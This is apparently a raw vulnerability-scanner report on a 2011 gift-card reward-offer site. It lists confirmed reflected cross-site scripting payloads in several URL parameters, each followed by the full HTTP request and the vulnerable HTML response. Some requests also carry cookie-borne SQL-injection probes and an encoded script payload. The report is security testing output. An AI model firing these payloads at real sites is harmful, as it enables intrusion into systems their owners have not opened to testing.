</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=296..

Parameters

Parameter Type Value
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
path GET p.prize.prepop-reg-int
page_tmp_id GET 9
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_tmp GET 3
ups_ref GET cg
sendroikwd GET 3
raf_ad_id GET 3
remoteRef GET '"--></style></script><script>alert(0x0000A7)</script>
return_url GET 3
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265
page_list GET li_sr_sm

Request

GET /ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=3&ups_ref=cg&sendroikwd=3&raf_ad_id=3&remoteRef='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000A7)%3C/script%3E&return_url=3&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:57:26 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82ed616d71khk;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg-int&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef='"--></style></script><script>netsparker(0x0000A7)</script>&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0000A7)</script>&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-int-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0000A7)</script>&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=296..

Parameters

Parameter Type Value
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
path GET p.prize.prepop-reg-int
page_tmp_id GET 9
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_tmp GET 3
ups_ref GET cg
sendroikwd GET 3
raf_ad_id GET 3
remoteRef GET 3_4_0_5068_0
return_url GET '"--></style></script><script>alert(0x0000A8)</script>
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265
page_list GET li_sr_sm

Request

GET /ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=3&ups_ref=cg&sendroikwd=3&raf_ad_id=3&remoteRef=3_4_0_5068_0&return_url='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000A8)%3C/script%3E&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: c_email_key=063756462f49f8c46ec5bc4e60bb02b1; gift_cookie=29617; promo_cookie=v4|207753-14843-:1303916209; scook=1303916209; k=5113356; v=5113356; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDI5KTwvc2NyaXB0Pg==; concat(CONCAT(CHAR(95)=; CHAR(33)=; CHAR(64)=; CHAR(52)=; CHAR(100)=; CHAR(105)=; CHAR(108)=; CHAR(101)=; CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:57:28 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82ed8d67c1e2p;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg-int&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url='"--></style></script><script>netsparker(0x0000A8)</script>&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0000A8)</script>&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-int-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0000A8)</script>&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=296..

Parameters

Parameter Type Value
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
path GET p.prize.prepop-reg-int
page_tmp_id GET 9
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_tmp GET 3
ups_ref GET cg
sendroikwd GET 3
raf_ad_id GET 3
remoteRef GET 3_4_0_5068_0
return_url GET 3
short_ic_path GET '"--></style></script><script>alert(0x0000A9)</script>
SID GET f05c7ce946bc38d8bfa6b839a4d56265
page_list GET li_sr_sm

Request

GET /ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=3&ups_ref=cg&sendroikwd=3&raf_ad_id=3&remoteRef=3_4_0_5068_0&return_url=3&short_ic_path='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000A9)%3C/script%3E&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: c_email_key=063756462f49f8c46ec5bc4e60bb02b1; gift_cookie=29617; promo_cookie=v4|207753-14843-:1303916209; scook=1303916209; k=5113356; v=5113356; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDI5KTwvc2NyaXB0Pg==; concat(CONCAT(CHAR(95)=; CHAR(33)=; CHAR(64)=; CHAR(52)=; CHAR(100)=; CHAR(105)=; CHAR(108)=; CHAR(101)=; CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:57:31 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82edb1c46fb0i;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg-int&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
